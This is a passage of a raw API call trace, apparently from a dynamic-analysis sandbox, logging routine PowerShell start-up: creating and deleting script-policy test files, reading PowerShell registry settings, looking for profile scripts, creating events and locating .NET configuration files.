0x24 [0151.610] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0151.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe58c) returned 1 [0151.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp"), fInfoLevelId=0x0, lpFileInformation=0xdbe608 | out: lpFileInformation=0xdbe608*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x744ebc9f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x744ebc9f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0151.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe588) returned 1 [0151.615] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0151.615] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", nBufferLength=0x49, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", lpFilePart=0x0) returned 0x48 [0151.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe4d4) returned 1 [0151.615] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_gm1uxt2p.gka.ps1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6c4 [0151.616] GetFileType (hFile=0x6c4) returned 0x1 [0151.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe4d0) returned 1 [0151.616] GetFileType (hFile=0x6c4) returned 0x1 [0151.617] WriteFile (in: hFile=0x6c4, lpBuffer=0x52cd308*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0xdbe550, lpOverlapped=0x0 | out: lpBuffer=0x52cd308*, lpNumberOfBytesWritten=0xdbe550*=0x1, lpOverlapped=0x0) returned 1 [0151.618] CloseHandle (hObject=0x6c4) returned 1 [0151.618] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0151.618] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", lpFilePart=0x0) returned 0x49 [0151.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe4d4) returned 1 [0151.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_jesyjp4e.utn.psm1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6c4 [0151.619] GetFileType (hFile=0x6c4) returned 0x1 [0151.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe4d0) returned 1 [0151.619] GetFileType (hFile=0x6c4) returned 0x1 [0151.619] WriteFile (in: hFile=0x6c4, lpBuffer=0x52cf854*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0xdbe550, lpOverlapped=0x0 | out: lpBuffer=0x52cf854*, lpNumberOfBytesWritten=0xdbe550*=0x1, lpOverlapped=0x0) returned 1 [0151.698] CloseHandle (hObject=0x6c4) returned 1 [0151.700] CoTaskMemAlloc (cb=0x92) returned 0x76698d0 [0151.700] IdentifyCodeAuthzLevelW () returned 0x1 [0151.734] CoTaskMemFree (pv=0x76698d0) [0151.735] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0151.736] CloseCodeAuthzLevel () returned 0x1 [0151.736] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0151.736] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", nBufferLength=0x49, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", lpFilePart=0x0) returned 0x48 [0151.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe594) returned 1 [0151.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_gm1uxt2p.gka.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdbe610 | out: lpFileInformation=0xdbe610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbba453e3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0xbba453e3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xbba453e3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0151.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe590) returned 1 [0151.736] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0151.736] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", nBufferLength=0x49, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1", lpFilePart=0x0) returned 0x48 [0151.737] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gm1uxt2p.gka.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_gm1uxt2p.gka.ps1")) returned 1 [0151.738] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0151.738] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", lpFilePart=0x0) returned 0x49 [0151.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe594) returned 1 [0151.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_jesyjp4e.utn.psm1"), fInfoLevelId=0x0, lpFileInformation=0xdbe610 | out: lpFileInformation=0xdbe610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbba453e3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0xbba453e3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xbbb27ee3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0151.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe590) returned 1 [0151.738] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0151.738] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1", lpFilePart=0x0) returned 0x49 [0151.738] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jesyjp4e.utn.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_jesyjp4e.utn.psm1")) returned 1 [0151.740] GetSystemInfo (in: lpSystemInfo=0xdbe648 | out: lpSystemInfo=0xdbe648*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0151.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe5d8 | out: phkResult=0xdbe5d8*=0x6c8) returned 0x0 [0151.740] RegQueryValueExW (in: hKey=0x6c8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xdbe5f4, lpData=0x0, lpcbData=0xdbe5f0*=0x0 | out: lpType=0xdbe5f4*=0x0, lpData=0x0, lpcbData=0xdbe5f0*=0x0) returned 0x2 [0151.741] RegCloseKey (hKey=0x6c8) returned 0x0 [0151.849] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe624 | out: phkResult=0xdbe624*=0x6c8) returned 0x0 [0151.849] RegQueryValueExW (in: hKey=0x6c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe644, lpData=0x0, lpcbData=0xdbe640*=0x0 | out: lpType=0xdbe644*=0x1, lpData=0x0, lpcbData=0xdbe640*=0x56) returned 0x0 [0151.849] RegQueryValueExW (in: hKey=0x6c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe644, lpData=0x52d0dfc, lpcbData=0xdbe640*=0x56 | out: lpType=0xdbe644*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdbe640*=0x56) returned 0x0 [0151.849] RegCloseKey (hKey=0x6c8) returned 0x0 [0151.850] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe624 | out: phkResult=0xdbe624*=0x6c8) returned 0x0 [0151.850] RegQueryValueExW (in: hKey=0x6c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe644, lpData=0x0, lpcbData=0xdbe640*=0x0 | out: lpType=0xdbe644*=0x1, lpData=0x0, lpcbData=0xdbe640*=0x56) returned 0x0 [0151.850] RegQueryValueExW (in: hKey=0x6c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe644, lpData=0x52d1174, lpcbData=0xdbe640*=0x56 | out: lpType=0xdbe644*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdbe640*=0x56) returned 0x0 [0151.850] RegCloseKey (hKey=0x6c8) returned 0x0 [0151.867] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0151.867] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x12d5e20 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0151.867] CoTaskMemFree (pv=0x12d5e20) [0151.867] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0151.867] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0151.868] CoTaskMemAlloc (cb=0x20c) returned 0x12d5e20 [0151.868] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x12d5e20 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0151.868] CoTaskMemFree (pv=0x12d5e20) [0151.868] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0151.868] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0151.871] QueryPerformanceFrequency (in: lpFrequency=0x11b4da0 | out: lpFrequency=0x11b4da0*=100000000) returned 1 [0151.872] QueryPerformanceCounter (in: lpPerformanceCount=0xdbe6e4 | out: lpPerformanceCount=0xdbe6e4*=24762725037) returned 1 [0151.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0151.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x37, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0151.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe5f4) returned 1 [0151.872] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdbe670 | out: lpFileInformation=0xdbe670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe5f0) returned 1 [0151.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0151.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0151.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe5f4) returned 1 [0151.873] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdbe670 | out: lpFileInformation=0xdbe670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe5f0) returned 1 [0151.873] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0151.873] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x38, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x37 [0151.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe5f4) returned 1 [0151.873] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdbe670 | out: lpFileInformation=0xdbe670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe5f0) returned 1 [0151.873] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0151.873] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x4d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4c [0151.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdbe5f4) returned 1 [0151.873] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xdbe670 | out: lpFileInformation=0xdbe670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdbe5f0) returned 1 [0151.874] QueryPerformanceCounter (in: lpPerformanceCount=0xdbe6d4 | out: lpPerformanceCount=0xdbe6d4*=24762932076) returned 1 [0151.875] GetCurrentProcessId () returned 0x514 [0151.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x60f94e8, Length=0x28e38, ResultLength=0xdbe658 | out: SystemInformation=0x60f94e8, ResultLength=0xdbe658*=0x1ba98) returned 0x0 [0153.642] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6c8 [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6c4 [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6cc [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6d0 [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6d4 [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6d8 [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6dc [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6e0 [0153.643] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6e4 [0153.644] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6e8 [0153.644] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6ec [0153.644] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f0 [0153.653] SetEvent (hEvent=0x6d0) returned 1 [0153.653] SetEvent (hEvent=0x6c8) returned 1 [0153.653] SetEvent (hEvent=0x6c4) returned 1 [0153.653] SetEvent (hEvent=0x6cc) returned 1 [0153.653] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f4 [0153.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe55c | out: phkResult=0xdbe55c*=0x6f8) returned 0x0 [0153.655] RegQueryValueExW (in: hKey=0x6f8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xdbe57c, lpData=0x0, lpcbData=0xdbe578*=0x0 | out: lpType=0xdbe57c*=0x0, lpData=0x0, lpcbData=0xdbe578*=0x0) returned 0x2 [0153.656] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6fc [0153.657] SetEvent (hEvent=0x6fc) returned 1 [0186.128] AmsiCloseSession () returned 0x35b7d80 [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x830 [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x828 [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x888 [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x880 [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x87c [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x878 [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x874 [0186.128] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x870 [0186.129] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x86c [0186.129] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x868 [0186.129] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x864 [0186.129] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x860 [0186.129] SetEvent (hEvent=0x880) returned 1 [0186.129] SetEvent (hEvent=0x830) returned 1 [0186.129] SetEvent (hEvent=0x828) returned 1 [0186.129] SetEvent (hEvent=0x888) returned 1 [0186.129] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x85c [0186.130] SetEvent (hEvent=0x6fc) returned 1 [0186.256] SetEvent (hEvent=0x87c) returned 1 [0186.256] SetEvent (hEvent=0x878) returned 1 [0186.256] SetEvent (hEvent=0x874) returned 1 [0186.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xdbd974, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0186.855] CoTaskMemAlloc (cb=0x20c) returned 0x7b1b398 [0186.855] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b1b398, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0186.856] CoTaskMemFree (pv=0x7b1b398) [0186.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0186.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0186.924] GetCurrentProcess () returned 0xffffffff [0186.924] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbdcdc | out: TokenHandle=0xdbdcdc*=0x850) returned 1 [0186.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2f [0186.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x2f, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0186.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xdbdcd4 | out: lpFileInformation=0xdbdcd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0186.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0186.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0186.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" 